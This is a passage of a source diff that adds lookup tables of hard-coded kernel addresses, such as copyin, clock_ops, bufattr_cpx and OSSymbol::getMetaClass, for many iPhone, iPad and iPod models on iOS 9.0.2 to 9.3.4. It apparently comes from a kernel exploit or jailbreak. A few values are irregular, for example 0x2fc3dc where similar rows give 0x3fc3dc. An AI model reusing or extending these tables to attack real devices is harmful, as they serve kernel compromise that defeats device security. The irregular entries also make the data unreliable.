+        case iPad25_iOS902: return 0x317de4;
+        case iPad31_iOS910: return 0x319450;
+        case iPad31_iOS920: return 0x3106fc;
+        case iPad31_iOS921: return 0x3107fc;
+        case iPad31_iOS930: return 0x31812c;
+        case iPad31_iOS931: return 0x31812c;
+        case iPad31_iOS932: return 0x318264;
+        case iPad31_iOS933: return 0x318388;
+        case iPad31_iOS934: return 0x318388;
+        case iPad32_iOS910: return 0x319450;
+        case iPad32_iOS920: return 0x3106fc;
+        case iPad32_iOS921: return 0x3107fc;
+        case iPad32_iOS930: return 0x31812c;
+        case iPad32_iOS931: return 0x31812c;
+        case iPad32_iOS932: return 0x318264;
+        case iPad32_iOS933: return 0x318388;
+        case iPad32_iOS934: return 0x318388;
+        case iPad33_iOS902: return 0x317de4;
+        case iPad33_iOS910: return 0x319450;
+        case iPad33_iOS920: return 0x3106fc;
+        case iPad33_iOS921: return 0x3107fc;
+        case iPad33_iOS930: return 0x31812c;
+        case iPad33_iOS931: return 0x31812c;
+        case iPad33_iOS932: return 0x318264;
+        case iPad33_iOS933: return 0x318388;
+        case iPad33_iOS934: return 0x318388;
+        case iPad34_iOS910: return 0x31fd1c;
+        case iPad34_iOS920: return 0x317768;
+        case iPad34_iOS921: return 0x317868;
+        case iPad34_iOS930: return 0x31ef50;
+        case iPad34_iOS931: return 0x31ef50;
+        case iPad34_iOS932: return 0x31ef58;
+        case iPad34_iOS933: return 0x31f13c;
+        case iPad34_iOS934: return 0x31f13c;
+        case iPad35_iOS910: return 0x31fd1c;
+        case iPad35_iOS920: return 0x317768;
+        case iPad35_iOS921: return 0x317868;
+        case iPad35_iOS930: return 0x31ef50;
+        case iPad35_iOS931: return 0x31ef50;
+        case iPad35_iOS932: return 0x31ef58;
+        case iPad35_iOS933: return 0x31f13c;
+        case iPad35_iOS934: return 0x31f13c;
+        case iPad36_iOS910: return 0x31fd1c;
+        case iPad36_iOS920: return 0x317768;
+        case iPad36_iOS921: return 0x317868;
+        case iPad36_iOS930: return 0x31ef50;
+        case iPad36_iOS931: return 0x31ef50;
+        case iPad36_iOS932: return 0x31ef58;
+        case iPad36_iOS933: return 0x31f13c;
+        case iPad36_iOS934: return 0x31f13c;
+        case iPod51_iOS910: return 0x319450;
+        case iPod51_iOS920: return 0x3106fc;
+        case iPod51_iOS921: return 0x3107fc;
+        case iPod51_iOS930: return 0x31812c;
+        case iPod51_iOS931: return 0x31812c;
+        case iPod51_iOS932: return 0x318264;
+        case iPod51_iOS933: return 0x318388;
+        case iPod51_iOS934: return 0x318388;
+        default: return 0;
+    }
+}
+
+static inline unsigned int find_OSSymbol_getMetaClass(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0x31a5d0;
+        case iPhone41_iOS910: return 0x31bc3c;
+        case iPhone41_iOS920: return 0x312e18;
+        case iPhone41_iOS921: return 0x312f18;
+        case iPhone41_iOS930: return 0x31a934;
+        case iPhone41_iOS931: return 0x31a934;
+        case iPhone41_iOS932: return 0x31aa6c;
+        case iPhone41_iOS933: return 0x31ab90;
+        case iPhone41_iOS934: return 0x31ab90;
+        case iPhone51_iOS910: return 0x322460;
+        case iPhone51_iOS920: return 0x319ea0;
+        case iPhone51_iOS921: return 0x319fa0;
+        case iPhone51_iOS930: return 0x321810;
+        case iPhone51_iOS931: return 0x321810;
+        case iPhone51_iOS932: return 0x321818;
+        case iPhone51_iOS933: return 0x3219fc;
+        case iPhone51_iOS934: return 0x3219fc;
+        case iPhone52_iOS902: return 0x320f00;
+        case iPhone52_iOS910: return 0x322460;
+        case iPhone52_iOS920: return 0x319ea0;
+        case iPhone52_iOS921: return 0x319fa0;
+        case iPhone52_iOS930: return 0x321810;
+        case iPhone52_iOS931: return 0x321810;
+        case iPhone52_iOS932: return 0x321818;
+        case iPhone52_iOS933: return 0x3219fc;
+        case iPhone52_iOS934: return 0x3219fc;
+        case iPhone53_iOS910: return 0x322460;
+        case iPhone53_iOS920: return 0x319ea0;
+        case iPhone53_iOS921: return 0x319fa0;
+        case iPhone53_iOS930: return 0x321810;
+        case iPhone53_iOS931: return 0x321810;
+        case iPhone53_iOS932: return 0x321818;
+        case iPhone53_iOS933: return 0x3219fc;
+        case iPhone53_iOS934: return 0x3219fc;
+        case iPhone54_iOS910: return 0x322460;
+        case iPhone54_iOS920: return 0x319ea0;
+        case iPhone54_iOS921: return 0x319fa0;
+        case iPhone54_iOS930: return 0x321810;
+        case iPhone54_iOS931: return 0x321810;
+        case iPhone54_iOS932: return 0x321818;
+        case iPhone54_iOS933: return 0x3219fc;
+        case iPhone54_iOS934: return 0x3219fc;
+        case iPad21_iOS910: return 0x31bc3c;
+        case iPad21_iOS920: return 0x312e18;
+        case iPad21_iOS921: return 0x312f18;
+        case iPad21_iOS930: return 0x31a934;
+        case iPad21_iOS931: return 0x31a934;
+        case iPad21_iOS932: return 0x31aa6c;
+        case iPad21_iOS933: return 0x31ab90;
+        case iPad21_iOS934: return 0x31ab90;
+        case iPad22_iOS910: return 0x31bc3c;
+        case iPad22_iOS920: return 0x312e18;
+        case iPad22_iOS921: return 0x312f18;
+        case iPad22_iOS930: return 0x31a934;
+        case iPad22_iOS931: return 0x31a934;
+        case iPad22_iOS932: return 0x31aa6c;
+        case iPad22_iOS933: return 0x31ab90;
+        case iPad22_iOS934: return 0x31ab90;
+        case iPad23_iOS910: return 0x31bc3c;
+        case iPad23_iOS920: return 0x312e18;
+        case iPad23_iOS921: return 0x312f18;
+        case iPad23_iOS930: return 0x31a934;
+        case iPad23_iOS931: return 0x31a934;
+        case iPad23_iOS932: return 0x31aa6c;
+        case iPad23_iOS933: return 0x31ab90;
+        case iPad23_iOS934: return 0x31ab90;
+        case iPad24_iOS910: return 0x31bc3c;
+        case iPad24_iOS920: return 0x312e18;
+        case iPad24_iOS921: return 0x312f18;
+        case iPad24_iOS930: return 0x31a934;
+        case iPad24_iOS931: return 0x31a934;
+        case iPad24_iOS932: return 0x31aa6c;
+        case iPad24_iOS933: return 0x31ab90;
+        case iPad24_iOS934: return 0x31ab90;
+        case iPad25_iOS902: return 0x31a5d0;
+        case iPad31_iOS910: return 0x31bc3c;
+        case iPad31_iOS920: return 0x312e18;
+        case iPad31_iOS921: return 0x312f18;
+        case iPad31_iOS930: return 0x31a934;
+        case iPad31_iOS931: return 0x31a934;
+        case iPad31_iOS932: return 0x31aa6c;
+        case iPad31_iOS933: return 0x31ab90;
+        case iPad31_iOS934: return 0x31ab90;
+        case iPad32_iOS910: return 0x31bc3c;
+        case iPad32_iOS920: return 0x312e18;
+        case iPad32_iOS921: return 0x312f18;
+        case iPad32_iOS930: return 0x31a934;
+        case iPad32_iOS931: return 0x31a934;
+        case iPad32_iOS932: return 0x31aa6c;
+        case iPad32_iOS933: return 0x31ab90;
+        case iPad32_iOS934: return 0x31ab90;
+        case iPad33_iOS902: return 0x31a5d0;
+        case iPad33_iOS910: return 0x31bc3c;
+        case iPad33_iOS920: return 0x312e18;
+        case iPad33_iOS921: return 0x312f18;
+        case iPad33_iOS930: return 0x31a934;
+        case iPad33_iOS931: return 0x31a934;
+        case iPad33_iOS932: return 0x31aa6c;
+        case iPad33_iOS933: return 0x31ab90;
+        case iPad33_iOS934: return 0x31ab90;
+        case iPad34_iOS910: return 0x322460;
+        case iPad34_iOS920: return 0x319ea0;
+        case iPad34_iOS921: return 0x319fa0;
+        case iPad34_iOS930: return 0x321810;
+        case iPad34_iOS931: return 0x321810;
+        case iPad34_iOS932: return 0x321818;
+        case iPad34_iOS933: return 0x3219fc;
+        case iPad34_iOS934: return 0x3219fc;
+        case iPad35_iOS910: return 0x322460;
+        case iPad35_iOS920: return 0x319ea0;
+        case iPad35_iOS921: return 0x319fa0;
+        case iPad35_iOS930: return 0x321810;
+        case iPad35_iOS931: return 0x321810;
+        case iPad35_iOS932: return 0x321818;
+        case iPad35_iOS933: return 0x3219fc;
+        case iPad35_iOS934: return 0x3219fc;
+        case iPad36_iOS910: return 0x322460;
+        case iPad36_iOS920: return 0x319ea0;
+        case iPad36_iOS921: return 0x319fa0;
+        case iPad36_iOS930: return 0x321810;
+        case iPad36_iOS931: return 0x321810;
+        case iPad36_iOS932: return 0x321818;
+        case iPad36_iOS933: return 0x3219fc;
+        case iPad36_iOS934: return 0x3219fc;
+        case iPod51_iOS910: return 0x31bc3c;
+        case iPod51_iOS920: return 0x312e18;
+        case iPod51_iOS921: return 0x312f18;
+        case iPod51_iOS930: return 0x31a934;
+        case iPod51_iOS931: return 0x31a934;
+        case iPod51_iOS932: return 0x31aa6c;
+        case iPod51_iOS933: return 0x31ab90;
+        case iPod51_iOS934: return 0x31ab90;
+        default: return 0;
+    }
+}
+
+static inline unsigned int find_calend_gettime(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0x1daec;
+        case iPhone41_iOS910: return 0x1db34;
+        case iPhone41_iOS920: return 0x1de84;
+        case iPhone41_iOS921: return 0x1de60;
+        case iPhone41_iOS930: return 0x1e170;
+        case iPhone41_iOS931: return 0x1e170;
+        case iPhone41_iOS932: return 0x1e170;
+        case iPhone41_iOS933: return 0x1e200;
+        case iPhone41_iOS934: return 0x1e200;
+        case iPhone51_iOS910: return 0x1e76c;
+        case iPhone51_iOS920: return 0x1ebac;
+        case iPhone51_iOS921: return 0x1eb88;
+        case iPhone51_iOS930: return 0x1ee6c;
+        case iPhone51_iOS931: return 0x1ee6c;
+        case iPhone51_iOS932: return 0x1ee6c;
+        case iPhone51_iOS933: return 0x1eeac;
+        case iPhone51_iOS934: return 0x1eeac;
+        case iPhone52_iOS902: return 0x1e718;
+        case iPhone52_iOS910: return 0x1e76c;
+        case iPhone52_iOS920: return 0x1ebac;
+        case iPhone52_iOS921: return 0x1eb88;
+        case iPhone52_iOS930: return 0x1ee6c;
+        case iPhone52_iOS931: return 0x1ee6c;
+        case iPhone52_iOS932: return 0x1ee6c;
+        case iPhone52_iOS933: return 0x1eeac;
+        case iPhone52_iOS934: return 0x1eeac;
+        case iPhone53_iOS910: return 0x1e76c;
+        case iPhone53_iOS920: return 0x1ebac;
+        case iPhone53_iOS921: return 0x1eb88;
+        case iPhone53_iOS930: return 0x1ee6c;
+        case iPhone53_iOS931: return 0x1ee6c;
+        case iPhone53_iOS932: return 0x1ee6c;
+        case iPhone53_iOS933: return 0x1eeac;
+        case iPhone53_iOS934: return 0x1eeac;
+        case iPhone54_iOS910: return 0x1e76c;
+        case iPhone54_iOS920: return 0x1ebac;
+        case iPhone54_iOS921: return 0x1eb88;
+        case iPhone54_iOS930: return 0x1ee6c;
+        case iPhone54_iOS931: return 0x1ee6c;
+        case iPhone54_iOS932: return 0x1ee6c;
+        case iPhone54_iOS933: return 0x1eeac;
+        case iPhone54_iOS934: return 0x1eeac;
+        case iPad21_iOS910: return 0x1db34;
+        case iPad21_iOS920: return 0x1de84;
+        case iPad21_iOS921: return 0x1de60;
+        case iPad21_iOS930: return 0x1e170;
+        case iPad21_iOS931: return 0x1e170;
+        case iPad21_iOS932: return 0x1e170;
+        case iPad21_iOS933: return 0x1e200;
+        case iPad21_iOS934: return 0x1e200;
+        case iPad22_iOS910: return 0x1db34;
+        case iPad22_iOS920: return 0x1de84;
+        case iPad22_iOS921: return 0x1de60;
+        case iPad22_iOS930: return 0x1e170;
+        case iPad22_iOS931: return 0x1e170;
+        case iPad22_iOS932: return 0x1e170;
+        case iPad22_iOS933: return 0x1e200;
+        case iPad22_iOS934: return 0x1e200;
+        case iPad23_iOS910: return 0x1db34;
+        case iPad23_iOS920: return 0x1de84;
+        case iPad23_iOS921: return 0x1de60;
+        case iPad23_iOS930: return 0x1e170;
+        case iPad23_iOS931: return 0x1e170;
+        case iPad23_iOS932: return 0x1e170;
+        case iPad23_iOS933: return 0x1e200;
+        case iPad23_iOS934: return 0x1e200;
+        case iPad24_iOS910: return 0x1db34;
+        case iPad24_iOS920: return 0x1de84;
+        case iPad24_iOS921: return 0x1de60;
+        case iPad24_iOS930: return 0x1e170;
+        case iPad24_iOS931: return 0x1e170;
+        case iPad24_iOS932: return 0x1e170;
+        case iPad24_iOS933: return 0x1e200;
+        case iPad24_iOS934: return 0x1e200;
+        case iPad25_iOS902: return 0x1daec;
+        case iPad31_iOS910: return 0x1db34;
+        case iPad31_iOS920: return 0x1de84;
+        case iPad31_iOS921: return 0x1de60;
+        case iPad31_iOS930: return 0x1e170;
+        case iPad31_iOS931: return 0x1e170;
+        case iPad31_iOS932: return 0x1e170;
+        case iPad31_iOS933: return 0x1e200;
+        case iPad31_iOS934: return 0x1e200;
+        case iPad32_iOS910: return 0x1db34;
+        case iPad32_iOS920: return 0x1de84;
+        case iPad32_iOS921: return 0x1de60;
+        case iPad32_iOS930: return 0x1e170;
+        case iPad32_iOS931: return 0x1e170;
+        case iPad32_iOS932: return 0x1e170;
+        case iPad32_iOS933: return 0x1e200;
+        case iPad32_iOS934: return 0x1e200;
+        case iPad33_iOS902: return 0x1daec;
+        case iPad33_iOS910: return 0x1db34;
+        case iPad33_iOS920: return 0x1de84;
+        case iPad33_iOS921: return 0x1de60;
+        case iPad33_iOS930: return 0x1e170;
+        case iPad33_iOS931: return 0x1e170;
+        case iPad33_iOS932: return 0x1e170;
+        case iPad33_iOS933: return 0x1e200;
+        case iPad33_iOS934: return 0x1e200;
+        case iPad34_iOS910: return 0x1e76c;
+        case iPad34_iOS920: return 0x1ebac;
+        case iPad34_iOS921: return 0x1eb88;
+        case iPad34_iOS930: return 0x1ee6c;
+        case iPad34_iOS931: return 0x1ee6c;
+        case iPad34_iOS932: return 0x1ee6c;
+        case iPad34_iOS933: return 0x1eeac;
+        case iPad34_iOS934: return 0x1eeac;
+        case iPad35_iOS910: return 0x1e76c;
+        case iPad35_iOS920: return 0x1ebac;
+        case iPad35_iOS921: return 0x1eb88;
+        case iPad35_iOS930: return 0x1ee6c;
+        case iPad35_iOS931: return 0x1ee6c;
+        case iPad35_iOS932: return 0x1ee6c;
+        case iPad35_iOS933: return 0x1eeac;
+        case iPad35_iOS934: return 0x1eeac;
+        case iPad36_iOS910: return 0x1e76c;
+        case iPad36_iOS920: return 0x1ebac;
+        case iPad36_iOS921: return 0x1eb88;
+        case iPad36_iOS930: return 0x1ee6c;
+        case iPad36_iOS931: return 0x1ee6c;
+        case iPad36_iOS932: return 0x1ee6c;
+        case iPad36_iOS933: return 0x1eeac;
+        case iPad36_iOS934: return 0x1eeac;
+        case iPod51_iOS910: return 0x1db34;
+        case iPod51_iOS920: return 0x1de84;
+        case iPod51_iOS921: return 0x1de60;
+        case iPod51_iOS930: return 0x1e170;
+        case iPod51_iOS931: return 0x1e170;
+        case iPod51_iOS932: return 0x1e170;
+        case iPod51_iOS933: return 0x1e200;
+        case iPod51_iOS934: return 0x1e200;
+        default: return 0;
+    }
+}
+
+static inline unsigned int find_bufattr_cpx(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0xd97d0;
+        case iPhone41_iOS910: return 0xd97d0;
+        case iPhone41_iOS920: return 0xd8750;
+        case iPhone41_iOS921: return 0xd8750;
+        case iPhone41_iOS930: return 0xd9848;
+        case iPhone41_iOS931: return 0xd9848;
+        case iPhone41_iOS932: return 0xd9848;
+        case iPhone41_iOS933: return 0xd9838;
+        case iPhone41_iOS934: return 0xd9838;
+        case iPhone51_iOS910: return 0xde9fc;
+        case iPhone51_iOS920: return 0xdd9dc;
+        case iPhone51_iOS921: return 0xdd9dc;
+        case iPhone51_iOS930: return 0xdea48;
+        case iPhone51_iOS931: return 0xdea48;
+        case iPhone51_iOS932: return 0xdea48;
+        case iPhone51_iOS933: return 0xdea48;
+        case iPhone51_iOS934: return 0xdea48;
+        case iPhone52_iOS902: return 0xde9fc;
+        case iPhone52_iOS910: return 0xde9fc;
+        case iPhone52_iOS920: return 0xdd9dc;
+        case iPhone52_iOS921: return 0xdd9dc;
+        case iPhone52_iOS930: return 0xdea48;
+        case iPhone52_iOS931: return 0xdea48;
+        case iPhone52_iOS932: return 0xdea48;
+        case iPhone52_iOS933: return 0xdea48;
+        case iPhone52_iOS934: return 0xdea48;
+        case iPhone53_iOS910: return 0xde9fc;
+        case iPhone53_iOS920: return 0xdd9dc;
+        case iPhone53_iOS921: return 0xdd9dc;
+        case iPhone53_iOS930: return 0xdea48;
+        case iPhone53_iOS931: return 0xdea48;
+        case iPhone53_iOS932: return 0xdea48;
+        case iPhone53_iOS933: return 0xdea48;
+        case iPhone53_iOS934: return 0xdea48;
+        case iPhone54_iOS910: return 0xde9fc;
+        case iPhone54_iOS920: return 0xdd9dc;
+        case iPhone54_iOS921: return 0xdd9dc;
+        case iPhone54_iOS930: return 0xdea48;
+        case iPhone54_iOS931: return 0xdea48;
+        case iPhone54_iOS932: return 0xdea48;
+        case iPhone54_iOS933: return 0xdea48;
+        case iPhone54_iOS934: return 0xdea48;
+        case iPad21_iOS910: return 0xd97d0;
+        case iPad21_iOS920: return 0xd8750;
+        case iPad21_iOS921: return 0xd8750;
+        case iPad21_iOS930: return 0xd9848;
+        case iPad21_iOS931: return 0xd9848;
+        case iPad21_iOS932: return 0xd9848;
+        case iPad21_iOS933: return 0xd9838;
+        case iPad21_iOS934: return 0xd9838;
+        case iPad22_iOS910: return 0xd97d0;
+        case iPad22_iOS920: return 0xd8750;
+        case iPad22_iOS921: return 0xd8750;
+        case iPad22_iOS930: return 0xd9848;
+        case iPad22_iOS931: return 0xd9848;
+        case iPad22_iOS932: return 0xd9848;
+        case iPad22_iOS933: return 0xd9838;
+        case iPad22_iOS934: return 0xd9838;
+        case iPad23_iOS910: return 0xd97d0;
+        case iPad23_iOS920: return 0xd8750;
+        case iPad23_iOS921: return 0xd8750;
+        case iPad23_iOS930: return 0xd9848;
+        case iPad23_iOS931: return 0xd9848;
+        case iPad23_iOS932: return 0xd9848;
+        case iPad23_iOS933: return 0xd9838;
+        case iPad23_iOS934: return 0xd9838;
+        case iPad24_iOS910: return 0xd97d0;
+        case iPad24_iOS920: return 0xd8750;
+        case iPad24_iOS921: return 0xd8750;
+        case iPad24_iOS930: return 0xd9848;
+        case iPad24_iOS932: return 0xd9848;
+        case iPad24_iOS933: return 0xd9838;
+        case iPad24_iOS934: return 0xd9838;
+        case iPad25_iOS902: return 0xd97d0;
+        case iPad31_iOS910: return 0xd97d0;
+        case iPad31_iOS920: return 0xd8750;
+        case iPad31_iOS921: return 0xd8750;
+        case iPad31_iOS930: return 0xd9848;
+        case iPad31_iOS931: return 0xd9848;
+        case iPad31_iOS932: return 0xd9848;
+        case iPad31_iOS933: return 0xd9838;
+        case iPad31_iOS934: return 0xd9838;
+        case iPad32_iOS910: return 0xd97d0;
+        case iPad32_iOS920: return 0xd8750;
+        case iPad32_iOS921: return 0xd8750;
+        case iPad32_iOS930: return 0xd9848;
+        case iPad32_iOS931: return 0xd9848;
+        case iPad32_iOS932: return 0xd9848;
+        case iPad32_iOS933: return 0xd9838;
+        case iPad32_iOS934: return 0xd9838;
+        case iPad33_iOS902: return 0xd97d0;
+        case iPad33_iOS910: return 0xd97d0;
+        case iPad33_iOS920: return 0xd8750;
+        case iPad33_iOS921: return 0xd8750;
+        case iPad33_iOS930: return 0xd9848;
+        case iPad33_iOS931: return 0xd9848;
+        case iPad33_iOS932: return 0xd9848;
+        case iPad33_iOS933: return 0xd9838;
+        case iPad33_iOS934: return 0xd9838;
+        case iPad34_iOS910: return 0xde9fc;
+        case iPad34_iOS920: return 0xdd9dc;
+        case iPad34_iOS921: return 0xdd9dc;
+        case iPad34_iOS930: return 0xdea48;
+        case iPad34_iOS931: return 0xdea48;
+        case iPad34_iOS932: return 0xdea48;
+        case iPad34_iOS933: return 0xdea48;
+        case iPad34_iOS934: return 0xdea48;
+        case iPad35_iOS910: return 0xde9fc;
+        case iPad35_iOS920: return 0xdd9dc;
+        case iPad35_iOS921: return 0xdd9dc;
+        case iPad35_iOS930: return 0xdea48;
+        case iPad35_iOS931: return 0xdea48;
+        case iPad35_iOS932: return 0xdea48;
+        case iPad35_iOS933: return 0xdea48;
+        case iPad35_iOS934: return 0xdea48;
+        case iPad36_iOS910: return 0xde9fc;
+        case iPad36_iOS920: return 0xdd9dc;
+        case iPad36_iOS921: return 0xdd9dc;
+        case iPad36_iOS930: return 0xdea48;
+        case iPad36_iOS931: return 0xdea48;
+        case iPad36_iOS932: return 0xdea48;
+        case iPad36_iOS933: return 0xdea48;
+        case iPad36_iOS934: return 0xdea48;
+        case iPod51_iOS910: return 0xd97d0;
+        case iPod51_iOS920: return 0xd8750;
+        case iPod51_iOS921: return 0xd8750;
+        case iPod51_iOS930: return 0xd9848;
+        case iPod51_iOS931: return 0xd9848;
+        case iPod51_iOS932: return 0xd9848;
+        case iPod51_iOS933: return 0xd9838;
+        case iPod51_iOS934: return 0xd9838;
+        default: return 0;
+    }
+}
+
+static inline unsigned int find_clock_ops(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0x4043cc;
+        case iPhone41_iOS910: return 0x4053cc;
+        case iPhone41_iOS920: return 0x3fc3dc;
+        case iPhone41_iOS921: return 0x3fc3dc;
+        case iPhone41_iOS930: return 0x403428;
+        case iPhone41_iOS931: return 0x403428;
+        case iPhone41_iOS932: return 0x403428;
+        case iPhone41_iOS933: return 0x403428;
+        case iPhone41_iOS934: return 0x403428;
+        case iPhone51_iOS910: return 0x40c5a0;
+        case iPhone51_iOS920: return 0x4033dc;
+        case iPhone51_iOS921: return 0x4033dc;
+        case iPhone51_iOS930: return 0x403428;
+        case iPhone51_iOS931: return 0x40b428;
+        case iPhone51_iOS932: return 0x40b428;
+        case iPhone51_iOS933: return 0x40b428;
+        case iPhone51_iOS934: return 0x40b428;
+        case iPhone52_iOS902: return 0x40a3cc;
+        case iPhone52_iOS910: return 0x40c5a0;
+        case iPhone52_iOS920: return 0x4033dc;
+        case iPhone52_iOS921: return 0x4033dc;
+        case iPhone52_iOS930: return 0x403428;
+        case iPhone52_iOS931: return 0x40b428;
+        case iPhone52_iOS932: return 0x40b428;
+        case iPhone52_iOS933: return 0x40b428;
+        case iPhone52_iOS934: return 0x40b428;
+        case iPhone53_iOS910: return 0x40c5a0;
+        case iPhone53_iOS920: return 0x4033dc;
+        case iPhone53_iOS921: return 0x4033dc;
+        case iPhone53_iOS930: return 0x403428;
+        case iPhone53_iOS931: return 0x40b428;
+        case iPhone53_iOS932: return 0x40b428;
+        case iPhone53_iOS933: return 0x40b428;
+        case iPhone53_iOS934: return 0x40b428;
+        case iPhone54_iOS910: return 0x40c5a0;
+        case iPhone54_iOS920: return 0x4035a0;
+        case iPhone54_iOS921: return 0x4035a0;
+        case iPhone54_iOS930: return 0x403428;
+        case iPhone54_iOS931: return 0x40b428;
+        case iPhone54_iOS932: return 0x40b428;
+        case iPhone54_iOS933: return 0x40b428;
+        case iPhone54_iOS934: return 0x40b428;
+        case iPad21_iOS910: return 0x4053cc;
+        case iPad21_iOS920: return 0x3fc3dc;
+        case iPad21_iOS921: return 0x3fc3dc;
+        case iPad21_iOS930: return 0x403428;
+        case iPad21_iOS931: return 0x403428;
+        case iPad21_iOS932: return 0x403428;
+        case iPad21_iOS933: return 0x403428;
+        case iPad21_iOS934: return 0x403428;
+        case iPad22_iOS910: return 0x4053cc;
+        case iPad22_iOS920: return 0x3fc3dc;
+        case iPad22_iOS921: return 0x3fc3dc;
+        case iPad22_iOS930: return 0x403428;
+        case iPad22_iOS931: return 0x403428;
+        case iPad22_iOS932: return 0x403428;
+        case iPad22_iOS933: return 0x403428;
+        case iPad22_iOS934: return 0x403428;
+        case iPad23_iOS910: return 0x4053cc;
+        case iPad23_iOS920: return 0x3fc3dc;
+        case iPad23_iOS921: return 0x2fc3dc;
+        case iPad23_iOS930: return 0x403428;
+        case iPad23_iOS931: return 0x403428;
+        case iPad23_iOS932: return 0x403428;
+        case iPad23_iOS933: return 0x403428;
+        case iPad23_iOS934: return 0x403428;
+        case iPad24_iOS910: return 0x4053cc;
+        case iPad24_iOS920: return 0x3fc3dc;
+        case iPad24_iOS921: return 0x2fc3dc;
+        case iPad24_iOS930: return 0x403428;
+        case iPad24_iOS931: return 0x403428;
+        case iPad24_iOS932: return 0x403428;
+        case iPad24_iOS933: return 0x403428;
+        case iPad24_iOS934: return 0x403428;
+        case iPad25_iOS902: return 0x4043c0;
+        case iPad31_iOS910: return 0x4053cc;
+        case iPad31_iOS920: return 0x3fc3dc;
+        case iPad31_iOS921: return 0x3fc3dc;
+        case iPad31_iOS930: return 0x403428;
+        case iPad31_iOS931: return 0x403428;
+        case iPad31_iOS932: return 0x403428;
+        case iPad31_iOS933: return 0x403428;
+        case iPad31_iOS934: return 0x403428;
+        case iPad32_iOS910: return 0x4053cc;
+        case iPad32_iOS920: return 0x3fc3dc;
+        case iPad32_iOS921: return 0x3fc3dc;
+        case iPad32_iOS930: return 0x403428;
+        case iPad32_iOS931: return 0x403428;
+        case iPad32_iOS932: return 0x403428;
+        case iPad32_iOS933: return 0x403428;
+        case iPad32_iOS934: return 0x403428;
+        case iPad33_iOS902: return 0x4043c0;
+        case iPad33_iOS910: return 0x4053cc;
+        case iPad33_iOS920: return 0x3fc3dc;
+        case iPad33_iOS921: return 0x3fc3dc;
+        case iPad33_iOS930: return 0x403428;
+        case iPad33_iOS931: return 0x403428;
+        case iPad33_iOS932: return 0x403428;
+        case iPad33_iOS933: return 0x403428;
+        case iPad33_iOS934: return 0x403428;
+        case iPad34_iOS910: return 0x40c3cc;
+        case iPad34_iOS920: return 0x4033dc;
+        case iPad34_iOS921: return 0x4033dc;
+        case iPad34_iOS930: return 0x403428;
+        case iPad34_iOS931: return 0x40b428;
+        case iPad34_iOS932: return 0x40b428;
+        case iPad34_iOS933: return 0x40b428;
+        case iPad34_iOS934: return 0x40b428;
+        case iPad35_iOS910: return 0x40c3cc;
+        case iPad35_iOS920: return 0x4033dc;
+        case iPad35_iOS921: return 0x4033dc;
+        case iPad35_iOS930: return 0x403428;
+        case iPad35_iOS931: return 0x40b428;
+        case iPad35_iOS932: return 0x40b428;
+        case iPad35_iOS933: return 0x40b428;
+        case iPad35_iOS934: return 0x40b428;
+        case iPad36_iOS910: return 0x40c3cc;
+        case iPad36_iOS920: return 0x4033dc;
+        case iPad36_iOS921: return 0x4033dc;
+        case iPad36_iOS930: return 0x403428;
+        case iPad36_iOS931: return 0x40b428;
+        case iPad36_iOS932: return 0x40b428;
+        case iPad36_iOS933: return 0x40b428;
+        case iPad36_iOS934: return 0x40b428;
+        case iPod51_iOS910: return 0x4053cc;
+        case iPod51_iOS920: return 0x3fc3dc;
+        case iPod51_iOS921: return 0x3fc3dc;
+        case iPod51_iOS930: return 0x403428;
+        case iPod51_iOS931: return 0x403428;
+        case iPod51_iOS932: return 0x403428;
+        case iPod51_iOS933: return 0x403428;
+        case iPod51_iOS934: return 0x403428;
+        default: return 0;
+    }
+}
+
+static inline unsigned int find_copyin(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0xc7754;
+        case iPhone41_iOS910: return 0xc7754;
+        case iPhone41_iOS920: return 0xc6754;
+        case iPhone41_iOS921: return 0xc6754;
+        case iPhone41_iOS930: return 0xc76b4;
+        case iPhone41_iOS931: return 0xc76b4;
+        case iPhone41_iOS932: return 0xc76b4;
+        case iPhone41_iOS933: return 0xc76b4;
+        case iPhone41_iOS934: return 0xc76b4;
+        case iPhone51_iOS910: return 0xcb87c;
+        case iPhone51_iOS920: return 0xca87c;
+        case iPhone51_iOS921: return 0xca87c;
+        case iPhone51_iOS930: return 0xcb7dc;
+        case iPhone51_iOS931: return 0xcb7dc;
+        case iPhone51_iOS932: return 0xcb7dc;
+        case iPhone51_iOS933: return 0xcb7dc;
+        case iPhone51_iOS934: return 0xcb7dc;
+        case iPhone52_iOS902: return 0xcb87c;
+        case iPhone52_iOS910: return 0xcb87c;
+        case iPhone52_iOS920: return 0xca87c;
+        case iPhone52_iOS921: return 0xca87c;
+        case iPhone52_iOS930: return 0xcb7dc;
+        case iPhone52_iOS931: return 0xcb7dc;
+        case iPhone52_iOS932: return 0xcb7dc;
+        case iPhone52_iOS933: return 0xcb7dc;
+        case iPhone52_iOS934: return 0xcb7dc;
+        case iPhone53_iOS910: return 0xcb87c;
+        case iPhone53_iOS920: return 0xca87c;
+        case iPhone53_iOS921: return 0xca87c;
+        case iPhone53_iOS930: return 0xcb7dc;
+        case iPhone53_iOS931: return 0xcb7dc;
+        case iPhone53_iOS932: return 0xcb7dc;
+        case iPhone53_iOS933: return 0xcb7dc;
+        case iPhone53_iOS934: return 0xcb7dc;
+        case iPhone54_iOS910: return 0xcb87c;
+        case iPhone54_iOS920: return 0xca87c;
+        case iPhone54_iOS921: return 0xca87c;
+        case iPhone54_iOS930: return 0xcb7dc;
+        case iPhone54_iOS931: return 0xcb7dc;
+        case iPhone54_iOS932: return 0xcb7dc;
+        case iPhone54_iOS933: return 0xcb7dc;
+        case iPhone54_iOS934: return 0xcb7dc;
+        case iPad21_iOS910: return 0xc7754;
+        case iPad21_iOS920: return 0xc6754;
+        case iPad21_iOS921: return 0xc6754;
+        case iPad21_iOS930: return 0xc76b4;
+        case iPad21_iOS931: return 0xc76b4;
+        case iPad21_iOS932: return 0xc76b4;
+        case iPad21_iOS933: return 0xc76b4;
+        case iPad21_iOS934: return 0xc76b4;
+        case iPad22_iOS910: return 0xc7754;
+        case iPad22_iOS920: return 0xc6754;
+        case iPad22_iOS921: return 0xc6754;
+        case iPad22_iOS930: return 0xc76b4;
+        case iPad22_iOS931: return 0xc76b4;
+        case iPad22_iOS932: return 0xc76b4;
+        case iPad22_iOS933: return 0xc76b4;
+        case iPad22_iOS934: return 0xc76b4;
+        case iPad23_iOS910: return 0xc7754;
+        case iPad23_iOS920: return 0xc6754;
+        case iPad23_iOS921: return 0xc6754;
